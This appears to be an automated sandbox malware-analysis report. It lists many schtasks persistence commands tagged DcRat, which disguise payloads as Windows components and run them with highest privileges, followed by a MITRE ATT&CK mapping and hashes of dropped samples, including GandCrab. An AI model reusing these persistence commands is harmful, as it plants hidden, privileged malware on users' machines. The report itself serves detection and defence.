schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Fonts\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
PID:7300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "NH-HelperN" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\NH-Helper.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\Fonts\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
PID:5196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "NH-Helper" /sc ONLOGON /tr "'C:\Users\Default User\NH-Helper.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "NH-HelperN" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\NH-Helper.exe'" /rl HIGHEST /f
1⤵
PID:4688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Users\Default\StartMenuExperienceHost.exe'" /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:7668

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\Default\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5612

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 14 /tr "'C:\Users\Default\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- DcRat
PID:2664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Default\RuntimeBroker.exe'" /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:8180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Users\Default\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- DcRat
PID:5056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /f
1⤵
- DcRat
PID:7644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6940

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:6816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f
1⤵
- DcRat
PID:6452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Scripting

T1064

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Safe Mode Boot

T1562.009

Scripting

T1064

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\123.bat

Filesize
443B

MD5
70170ba16a737a438223b88279dc6c85

SHA1
cc066efa0fca9bc9f44013660dea6b28ddfd6a24

SHA256
d3674f4b34a8ca8167160519aa5c66b6024eb09f4cb0c9278bc44370b0efec6a

SHA512
37cc8c954544374d0a1ca4d012c9bd0b47781bc9bb8d0c15a8a95b9934893db3bedee867b984c20edabe54c39574abf7250de433aade6c0d544b8dd2c972c6da

Download Submit
C:\Program Files (x86)\172407564549f9f59ff9210a9f3b93f8551fc2fdf5aeb80c40ec13c403393d131f4191de51907.exe

Filesize
233KB

MD5
4ef3177a2e94ce3d15ae9490a73a2212

SHA1
a34f47568ce7fcea97a002eebeae385efa98790c

SHA256
87353d18dfdebf4d0747bbf21d58adaed2b04060d61cba3fa052d522640520f0

SHA512
635ce5c0d1b9f7dd5d7b4c00f216af06dc7d818132ba87a57d3d54f6b30ee01f64430d2aa265f60027cc58dc2e738d5b674ee36ffdca34ff540ce44b7da7c502

Download Submit
C:\Program Files (x86)\2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c.exe

Filesize
55KB

MD5
17315d95e80eb36cc51a7d25e4c8b231

SHA1
95006ad8de0a17dc3df6698e195e62b8ee32475e

SHA256
2f1cc715d0e5d4e9142be74287e75887ec207a6bc006c0617eef653fae74647c

SHA512
481a15c46dcf38562aa989f52330e556da90a3ce00190cedb2e00b2a39df5db3bcc3af743060fd8c75933d6ae756aa4bbc176708f36d3b4aa443b4663ca94608

Download Submit
C:\Program Files (x86)\31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65.exe

Filesize
37KB

MD5
5c8eb40a1344bd8b18c1ef0d95d433d4

SHA1
b6c1f037637936ae018cc5e3e17ab9f3cc8cb3ff

SHA256
31cd1e172d0375c8cd5e58929b7d235d389bbfeb5387488083c5b86c943d0b65

SHA512
74aa4c3047e5fff0b0d903841ceb01cd0e9939244c9008a9ae6a77ee5484290e7a0df56bbfc422ff5cf80012e84b75af2cf8840fd6ce6c80ea361fa07e5da577

Download Submit
C:\Program Files (x86)\34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219.exe

Filesize
93KB

MD5
7299c8fe0d2e5c385c4e4711260ee2b5

SHA1
4814f8494c3ff005203838e25a62cdb1ce5f8d68

SHA256
34b0a29a97d72d74cbcf11b5b19c2324a9bbd58dd76a5e87976744414ad47219

SHA512
2103b6e574657998159979c0d1e9021175732fffbfcba4ac1c3f778b33010129b9b9467b6f6a1e5f4095e9bf62d2212654f20c5a051cbb72158a2a8f399dfaad

Download Submit
C:\Program Files (x86)\57ccb6f0bd910fed428761828ae93553.exe

Filesize
3.2MB

MD5
57ccb6f0bd910fed428761828ae93553

SHA1
71dfe6354ac308d03cf7219686358652b9a8d438

SHA256
7d357b523b5116915747af1fb0d5e6b20a472dd08fd4eda3d0733aeaf70dcd07

SHA512
44423e3df0d34d8917c82103f336cf0c61cd0aa2e3722e3baf9224daf0b620009967136b1625d2f783b1e36207ac529008d49235ae2ae50b01a9b053d0ba0878

Download Submit
C:\Program Files (x86)\5e710462c65fe899466e4fb7c1e33c9a.exe

Filesize
828KB

MD5
5e710462c65fe899466e4fb7c1e33c9a

SHA1
a0bee34a8865683de35502c1ed5ff41e86670718

SHA256
f4f54ed5ec3a6e3b427be418fa0f63061e2feffbb9c33ab3911404b1b8f93c7e

SHA512
35c4adede7a4f8baad61876de8821e91dfe4ace4ec721575fc8155f6e7d43c794a7d4741609fda24b16a82d3d9ae18bc35addb299416f59ad1cde74eedbfa0c2

Download Submit
C:\Program Files (x86)\70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2.exe

Filesize
568KB

MD5
4448a3c2ddfdda45009b440faa39a5fe

SHA1
b16a26331d6ebe8f4a45b43e8b0251a715139b10

SHA256
70e28b4e87181b012f43790f1cc8ccf79aae6d2e3ce66dd1659e8098e6c081c2

SHA512
094cef6184c29430be5e4536b54cdfa632b52e7e09c7a4c04104d1b533113f6de6190d6525aac84ddba631220ee0b33a047272b952765977df336a5fa72425b0

Download Submit
C:\Program Files (x86)\73c1c41b9e71c48e752a5cd19fe808b6.exe

Filesize
827KB

MD5
73c1c41b9e71c48e752a5cd19fe808b6

SHA1
b8bd41a0b9dc7baef6eb01dfe6c852afdfaeed18

SHA256
fce441edb227275c5380194cc7a96a95998de6d75cd601b73bce1be529a68bd6

SHA512
f146a8917d39aa29d52386f5a23bbc01fbfade291d576782b5cc80b0ca363fa24fee80f00cf81ffa40e12503fedd203b422b7ad97dbb0d4500152e86d974cb38

Download Submit
C:\Program Files (x86)\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe

Filesize
268KB

MD5
fc57a660e24d9c91cb5464b2ece30756

SHA1
6d70e4dcd68ea6dae43cc381d4be84bcfad38eda

SHA256
75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa

SHA512
8f0fa0a2e5553a4059ac3e224ea8106131193f3cec7c23456507f8404c42440267efe88462cf31bcd3a6f9dba57011933a2a43e74b1cccd5d1a363497d1a3a67

Download Submit
C:\Program Files (x86)\78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae.exe

Filesize
205KB

MD5
887b35a87fb75e2d889694143e3c9014

SHA1
c8be4500127bfce10ab38152a8a5003b75613603

SHA256
78cc9626bb8d6f9d8ddf8236c197894a86f9d54a294b38c9c0b82744496b3fae

SHA512
98cf0e201092e6d43a7ec5db4d80e6cc20ec9a983098b04597039b244535f78a4096b76bc62e591336b810fafa302e1009a64be6e788f24dcc8b3ac0c8eb930a

Download Submit
C:\Program Files (x86)\7f1630df6b57af024a3b561bdadc208f.exe

Filesize
175KB

MD5
7f1630df6b57af024a3b561bdadc208f

SHA1
9b304cb2eff05f040b76eccc00ee55b914cf1839

SHA256
c9dbac4fe659e8918f50a4a157713e40d71e05367799af66d1d7845d958ee3f7

SHA512
742219cb5c76b9d39ed56cff988a533d19ef3e202e0fa48e9a3aed7dd9de190eef0c313bc974e37e7f363892eb6787bc66657324be2f0fb05d1b0021ae61ec9e

Download Submit
C:\Program Files (x86)\938b92958ded4d50a357d22eddf141ad.exe

Filesize
308KB

MD5
938b92958ded4d50a357d22eddf141ad

SHA1
062f16b1cdfacc55f982908ee6c85fce6296805a

SHA256
93c8db29ec3707f13bf5a96d5b8a3dc33c2f5b870acd3df07292c724ce10a13f

SHA512
372942601188751cdbb79cc94469a66434ca2963591bb849137654622485cd92f4ac8fbbc9b83c3acdc128e354bb3b805af0fc0a465e0a2519d330f8ca9a6c36

Download Submit
C:\Program Files (x86)\BTZ.exe

Filesize
73KB

MD5
cff0392ac2a1d782f43f7938ea18af4f

SHA1
1dfd93a3106a1b4fd10cfaf8b8bb4bb606c4093d

SHA256
ecfed4163f7058856e1d253a29d06d808c069670e4a06cad66f42e71cbc83a2e

SHA512
134f6c8343bbcce6e23ae370193aa1b415f337790e13b2cd6171e657c775c7971a7b13146d930b5273b0ea64ee947df1cc5467e4dd52900d70f13550c6b9ae8b

Download Submit
C:\Program Files (x86)\Cat.exe

Filesize
2.1MB

MD5
fadadf302e5b6c4010d700a3802ac678

SHA1
6548d465ae4facaa1d2d1921e423a7b871bcf36b

SHA256
d61f36d7dc8cc8464434ee6fa72fec2d1e210978769d1443db08f1decd845f67

SHA512
571db891718f1cc7e260772054ec39592259fdb3238dab90071a8ab7eeddc5baf2de2719f12f246a4a0466da7b72776a49f51da124afff936cd78f4253b5646b

Download Submit
C:\Program Files (x86)\Client.exe

Filesize
100KB

MD5
21560cb75b809cf46626556cd5fbe3ab

SHA1
f2eec01d42a301c3caacd41cddb0ef2284dbb5a6

SHA256
d2525bab5cb322933c8978880975e0c189feece68ae3f1951bf46297c7f640fa

SHA512
21eac0037b16f968ee8743b52dc73efdd34d24c2502d090b399a552dc6cb75f7d3090c10d448c66b868b1c4a7c46a5068b084b88b487e40b1e755356cb7557db

Download Submit
C:\Program Files (x86)\Darkest Dungeon setub.exe

Filesize
284KB

MD5
382c21837fbb296675b92c64bbc6249d

SHA1
ddedd90110497139ee0b5fca0e8ea3b585271f6d

SHA256
6ba1d9cf4b63033c0d9752fbe663eee726a5cf5401b20b8b8e927cca39cf113d

SHA512
3a7cc906a9bc94526b0f0fbaff43fa6230e14d0226439d1558b1e09d258911beb79fbfdb56c9286373856dca958dd5decb10c42e7248763dde1e1e85a3aae727

Download Submit
C:\Program Files (x86)\Gandcrab5.0.3.exe

Filesize
424KB

MD5
95557a29de4b70a25ce62a03472be684

SHA1
5baabf2869278e60d4c4f236b832bffddd6cf969

SHA256
49b769536224f160b6087dc866edf6445531c6136ab76b9d5079ce622b043200

SHA512
79b78cf77926e0d8b424ad9984f72d4461c7d9e7af58c4e2af32fa7c58cc445c534228b0709b87f5e35e1c8793b3d028dc60787151d852b8524023d08b57f103

Download Submit
C:\Program Files (x86)\Happy18.exe

Filesize
9KB

MD5
8c0ec9b7f903dce401ac301fbf43e930

SHA1
46db7e2a37d95eb1265b30c1557a5e80683b48f1

SHA256
ddd60301114f7867605a31a6d7c4c2014fe28bd4e0edfc53024a22d10b7bf3f8

SHA512
5dc630f669ae4ddb6cbe6b6f276d63aaf9f55de964990b4a2a57830bd0fd1127a2ee729bc099b738e813c6e0b23a29c3d73b39bb6055372867eb1dcc57635ae5

Download Submit
C:\Program Files (x86)\LightNeuronX0.exe

Filesize
14KB

MD5
55319464e46e2c31d22b39b46d5477fb

SHA1
a4d1a34fe5effd90ccb6897679586ddc07fbc5cd

SHA256
14f530e16e8c6dbac02f1bde53594f01b7edab9c45c4c371a3093120276ffaf1

SHA512
3a3ad3aa4bf745932d8ea02f3c96774aada2d1d1723be1ceb6cd5b7823e3d0f4e91457dbeebe92c8a2c8e7bdc1134b3b59bb9d9ce7503aeae6c182894203c9a3

Download Submit
C:\Program Files (x86)\TEST.exe

Filesize
37KB

MD5
ca70b79092c1b1e6dc8eb7950864b0ee

SHA1
3396cebc62c348fc96463a73a40eb4e5e6bc09c5

SHA256
2ce66bab757ad6cbee699be5ad711582d837f3e0b216d70cdb933c4c9415b20b

SHA512
9eb6c13096de168c46d8c2dd78ce28a19dd4f0aadded4fcf6b9ed655faac43747f7eb7123f664c8e44d77aaf1c6948ec6072a9d63b98ec69e104a7bbb97ebe34

Download Submit
C:\Program Files (x86)\a6a1abaf12a28ea8f6553356c3bdcf57.exe

Filesize
874KB

MD5
a6a1abaf12a28ea8f6553356c3bdcf57

SHA1
b7613fb9944bc3d8e11b5eb6f7ff706f04e8ad53

SHA256
f2507211585dfe351ff53086f30b42572db223b2646e45f91b7f3e202bb0bb76

SHA512
e525d119128c1ca1c05d379b9ebba9791b7b15390c8999773bff6517fde674178e17ee2c7c126b249c8c54b4dd1c07326ba24d52c8c192f067bc7e8545113a65

Download Submit
C:\Program Files (x86)\evil.exe

Filesize
23KB

MD5
0e0d73422110762ad112c39647865d09

SHA1
4bb94e94e65a8bc12313783df99b96d89d7fd764

SHA256
02ac6f6f2eff68b25be9ec044a2af027fbc915af3053f647086f68ad8d6c2e30

SHA512
e31a21c42c7bcdeb8dd80418fad12d5dc8486e21b609f5636114021fbcadb989ca7a612c0300ebb235c5f7a167a60541125409bd959442116407f48808742607

Download Submit
C:\Program Files (x86)\fwclt.exe

Filesize
1024B

MD5
c98a0d1909d8fad4110c8f35ee6f8391

SHA1
3c2b7bb0f3c8ca829602e4182a816a0905398521

SHA256
0f5ec3b9535d4f956330351c5310626ffaa17f146ff51a8b3b10ea0a7039eadc

SHA512
d3760b816b2a3fc3ec4f3ed9eee869885943d95d8a18f8a8233bc3e1b0f774dc9f55b518a54bcac3f94b2d960a73e53987fc09fa338c5b56d20e042610c0d948

Download Submit
C:\Program Files (x86)\kosomk.exe

Filesize
23KB

MD5
926e2c78bcea51e5309db037b18b4202

SHA1
d4b80f95bfdc9c2ff860ac0cc2012a81b425801d

SHA256
1d74f423f423175189fbe07b34697cae04d6d48181efbed5c3b790a137145f10

SHA512
6962876b91bcf7d40d9250dde094ce560f3b3c7a4766ac5e810d27de46cd4167937042d5ae94b21f21a1b19dc4c39dc0107e2aac1fbcd17680345f2fe06354a1

Download Submit
C:\Program Files (x86)\malecus.exe

Filesize
15KB

MD5
0e741eb3f92a7a739628d04a5fd4aab9

SHA1
87a8865773a791ab3ca68201cee7a0c3fef2fab3

SHA256
1ef41bb945daf62e1a7098b1f9b684e54cb1ac5fbbadf1f49e5a87b1788b9f85

SHA512
1377611e60d25eb456f5d5c911fe16c7d655b7930a8475e7d164d0c536740d286c7c27bcedd191c266c3085f6570892a975fddaee9a9ab3ca4b598b53350283c

Download Submit
C:\Program Files (x86)\see7.exe

Filesize
574KB

MD5
1ccf28645e2d52556487a9710de54d8e

SHA1
e83b5b14a3d08d8838e23c08070ebec713f859ef

SHA256
513624286483a4e172511b412b82445a06eefc904d54de75da656ec1a6f8ae99

SHA512
5a5f4c5fb992bac2119234563a8a7d3418baab3e3519f936f13a598aa9026dbeba571b7981a5a6afa519e18b124d8cf4c6642b30b88a4a091a051e2b41c5f321

Download Submit
C:\Program Files (x86)\touhou virus.bat

Filesize
842B

MD5
ce982443fd7813bf5fac953b19d702af

SHA1
b4ddbc76f4f44ad82547b427ed1f67ca9d3b2665

SHA256
5f930dde52cdb9b2f0118be71c07fa77cf702b1e2d704a08ef9a6af6950413a2

SHA512
40b0e27d5a55633531ade75156a69df58d6cc33400380330a05d9e665f47857d4c1f76779ce790e84ac6208e1a58b468d056edd28a03c4e949dffc09acf0adc0

Download Submit
C:\Program Files (x86)\vbc.exe

Filesize
123KB

MD5
d2ce3b2a5f3efb1fcede96304e57a531

SHA1
d74be8fe0be4ec13340dad9c0fdeb653c9c8b90e

SHA256
e0a4948a58829f4ecd9e6fb9b28e127a6827bd8761ded085d2069a248f6f5462

SHA512
fd0d0b51000b146049db24ecac27885ff4f688b4e40b42061972d21aaa45f8657437db8f56880f5414f00b5e35febce8a339b1d30bd387f8f11a179b222e828b

Download Submit
C:\Program Files (x86)\virus.jk.exe

Filesize
2.0MB

MD5
e0d346913cbf16602edf1aceda2a62b1

SHA1
2387b499cba2684ab293a758413ea2a5f150fa45

SHA256
c1bc3d85a9f78eea49adfb80669570c0cd6cd3dda92223496182e3aadf4e0b30

SHA512
a2c9a2708b4e0a32ab10bd29428ad2583382a5bb56dc6641ae07144d8707efd963004d1a5e71a9c8b9c53e09629b60b9ef7e6a16366ee376083937e717c1977f

Download Submit
C:\Program Files (x86)\virus.jk.jk.exe

Filesize
2.0MB

MD5
7f29146a34aeafc8ef837ab6aed8fd6e

SHA1
10120c15f76b1a7b5a30f8fa829caac88c49d9dd

SHA256
de81bcbb17cde244e05a2b8342d5c8d1be0c344e78d0bc45a7f55a4282230955

SHA512
907a395e0efb69fb4066c9104feed095c0864af36f18bb2abc25b97dbb7c8bb6ccbd177afe42da7974fdee9a05e1d2fa4dd89f1863fee75842a5b7677bfebad6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2ee16858e751901224340cabb25e5704

SHA1
24e0d2d301f282fb8e492e9df0b36603b28477b2

SHA256
e9784fcff01f83f4925f23e3a24bce63314ea503c2091f7309c014895fead33c

SHA512
bd9994c2fb4bf097ce7ffea412a2bed97e3af386108ab6aab0df9472a92d4bd94489bb9c36750a92f9818fa3ea6d1756497f5364611e6ebd36de4cd14e9a0fba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a1d6cd9232412c4dc9165a643a1670e9

SHA1
b8fab236bdd3585832f483692335d03f014597b6

SHA256
5038f464afa6f19760613ee5a1a3a65eabb49a627261bbe464ef71e816c42fe2

SHA512
333c8ba65d322ae80d928cb89906fd0b467f0a6cc9a569a7377a4f2e41f0ec91e7715fb8a9cb4e4e80919d9617c4c555bf3cc6bffed707a237bb640b13b052b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9e96477fb47e4a8a6dab965f692cda7a

SHA1
fc2146abf8af3b6c6dfd738942b327a1d6785e96

SHA256
427efbbfa6e0285af837898d92fd1675022dedd3fd4c79432c30e84678a3848d

SHA512
1f68a882a2757842fc9ce59d25fedcf24cdd040d31ea18675766e258f288bdb618faed69198c079b2578f3014aac78a2bf1662ef72ea7579e4e467c780fb3de3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
56ecc1f2b5ab02fa4d6affeaf79fc774

SHA1
2115e8125108d2c139fc592b0e7cd0af2593ce7e

SHA256
166a56d906ba8c01b52315691512781b373c5fb037f4c2a2e624ec767e1ee864

SHA512
df713666e32df206651ddc6ae8829c8ec2e5fb2cc072d1a89afb7227b162d01a2934fbacb1aca711863673d922536babd31197a2ba49a742704ff3e3d8c45cce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4662c09b465ef7564427f9c090f9150b

SHA1
9e84576f2918203708662bf614f4a28f3d756209

SHA256
c662232be86aea50589242139f008e1c141cd8f72ab65bf0f65e3f051db59e48

SHA512
32d3fccb5d013ead0149e8bddb9678c4ecbe0b5f4026ae8c04403bc1e910302ce57c243e6bbf7b44b2be076887d556cb45cc71b890bcd0ad62d757ab0725cf32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ea667b2dedf919487c556b97119cf88a

SHA1
0ee7b1da90be47cc31406f4dba755fd083a29762

SHA256
9e7e47ebf490ba409eab3be0314fa695bf28f4764f4875c7568a54337f2df70f

SHA512
832391afcac34fc6c949dee8120f2a5f83ca68c159ff707751d844b085c7496930f0c8fd8313fd8f10a5f5725138be651953934aa79b087ba3c6dd22eaa49c72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015

Filesize
47KB

MD5
213af7ac1aa72e2c0c316743695b7cd0

SHA1
c93bf2de82958073a23b3a495356118ef718cecf

SHA256
f5680671f5dc330f962eb3de4164654e2c17284ac3a109f687ddabf104e25ce4

SHA512
d0e11f42a046682805d18a0a133df1c8c4272b94117de503dd4992c34f93e516b7decbf77496f45768aeb1a95f1493f74f5ff732e9b42efa6bff1b47e9b0c1b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
7b220527cd356833a167b62721a38c17

SHA1
d47d779bfec1938ec5bbcfdf61057a350f62be56

SHA256
91e14d03bbede350bcc8307c4effbd5da02e17e8aef0c38ca74c56256b157bf1

SHA512
1f9b7414542d789d7b0c7d9d406af47545aacd4d4e219466874e245fa75960016d7f150e7f1d80d45817ee7f83478496ab7dee9bfe4c6d4a4ee03457b88680d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d80ec5eb2636d4e44e977a9b9976f762

SHA1
cd4a241c6ca589c7467d890ccb82b58111aff02e

SHA256
c73569f59a1b966d004c5cafc9ab8f10e78c8465d6399c6a538b7281cbdeeb12

SHA512
f6622b719de0ef67ab9bab19a0265dfb09b815e3a682b62fe44c48b882520831af827bb1aaffeb12544773733c77d25d13d2136e448d34ebc8034c0d6b3904a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
a9a8dc078da69269f0398e9aae74dd63

SHA1
f2065bfd89831afa0bac4babb6ab6f69b9c5969e

SHA256
f62ff068bff37355956cf5f2c4d7edba555f5a57b17a35cd9e70748afc447ff1

SHA512
8f6417d3c3024df45aa9746539a4b1c1345002acf5140bac967d4cd7270885ba9a1d757af4f8e5a8a958aaa82acf0c3a24bd9cd82925e1dd07dee57287abd9aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
9d9f2eff0f1d2978f84be7786aec9a5e

SHA1
a3c853f56960d1155252a390b76f687fbe5437bd

SHA256
2a4621699923a237cb1c4b9733ec80ad34798351453a3a20730f1cc01c176973

SHA512
5b45b88f8cb7d5e9f950b26e8b945e9cb4045a0263598140cca0f983dab9de24ee499fe92331d10b18bdb33805258dc28a7c670dcc18cefb8b3d10ef3a9dcb78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
146B

MD5
a7c18ebfce63d9f8ef40eff40c4c8930

SHA1
b81ae6a0f0f4fee30e746e47413c4e4904a8d8d9

SHA256
f1d9e8420fdb81e2661119b3559f35a55fe2e9f314b9a38214bcf6ff40aae33d

SHA512
2a3827f04a26c9b6f5e2aa1cc565c27e26cd46a31d45b28f3ab4a1f97dbad6b0b6de1634b9b3250577536946ca6a2cba858ba8116689f821c3b86784e105ebf2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
82B

MD5
dbbba4260e76543477dca04c4236356d

SHA1
faf662454161fc89f7a9028a805406865a384930

SHA256
7cb8e85e9e9f2ed7254ff07e364fca04706a37a59017f188400cd40680c6fd33

SHA512
1508b24e3f11dc3eab320988c884b8a4ad931c8dcc1061ea4cd7742021adf4c18db872191ccaf857d98346fd20fb6595858c1b1bab095b9c95215cec2eb05c7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe58c697.TMP

Filesize
89B

MD5
35d7fbe8bce2050e83064b52044f95a4

SHA1
efed8cb87854890e7f6f167451d647f13f962f30

SHA256
d130ff5fd3ea8db71c8cca59b20131b79e1cf571d824c2b631b1cf28c3f7200c

SHA512
e93298128a3d67a4c4f0a6ccadb7d9d422d19951d21b9413a50be7c3da18fb2e4104e854b18b15e6b5d2d7866ed81a48912f899a54d2d513685c116d0e5f37ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
b09f0c04a6f89181934b609734ff48bd

SHA1
1938b2b848bcbfe006e81ea06c6f2056cca58241

SHA256
ba3b4ef1f33529a2c9f049e01fe995e7dadd21d92e9f999b2627bcee2cb8e98e

SHA512
543e03daa4285002f280b97639b911af0b293d0a3cde750eca6320f1dd5ed25cff9aecedadfda5205b8af0e58c2b06eb6b61f97c2977b46405f70ce53a136813

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
4acc3a347a22a31035fb0875443224e1

SHA1
9ff54047aee14f7b549582acc23e431158b127e9

SHA256
65e8c71d15b7cfb15fe9de74cc6f73e6d8010f83a1892d2f3e0aa7d065db6945

SHA512
1cc40af4ba4f86bb5177b754f7057d6a00bff4c4d10aaecd7ee655ffe9216584f244b6b7e2fbf54c750957b7491ee51abee1c0eab19310d3cb5dc6ccc33fb7ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
695fc037c061a35d2dd81bd40bdd8fd2

SHA1
da1ffd1f599e6385288c37bcaa65bd91fbf6a905

SHA256
92ce39ca19c88b9d7952af5691985fae7b7806e68f885b60da4ccd316b9e0ddf

SHA512
7a80a29c181e6c37729de32c301f26ce1d6a337ef24b5495cb32331c85c7c57fefa88231b6a968085d245e43537ee4f0ce069aca7bf00cdfbcf2b655cd733d84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5861b3.TMP

Filesize
1KB

MD5
30d7a6829d8c83e8f37d9d4ca3c57302

SHA1
8732cb7e1b514d94601d3a4d546e3fe37e3d1776

SHA256
1771cd8acfaddf5457259f27fb32bf22d33832ed068642b4bde227600c74c2bf

SHA512
c24f8d9b9d0f68af56b2234fba58be678d9e0d70253133ceb8f0c09e89eacde556fd4dc57cfde8c47c51a7730517fc1e9e7fd970a5156886be40d930a62d2a1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
bf15950892325368932e437a4f0791ac

SHA1
4804be5b8f671e69c328ccabd7af4fbe29be0c3e

SHA256
3a33381c89fd7ee503cac162f0340ce4bc37bd13f5521147382bccf76c0efb6a

SHA512
d3eb17d52275a50debe78d339b580726d3e0edb02c48088b19a7c96ea0e1270f94fe1614ce12f77497b99fabb22104343cb07d4f60b108fe1c8bc70a4cd07b12

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
131d2fcb812f5240dbdf98feee2578db

SHA1
bc42d65a09b07c5b638936c966e8150b34d8ebab

SHA256
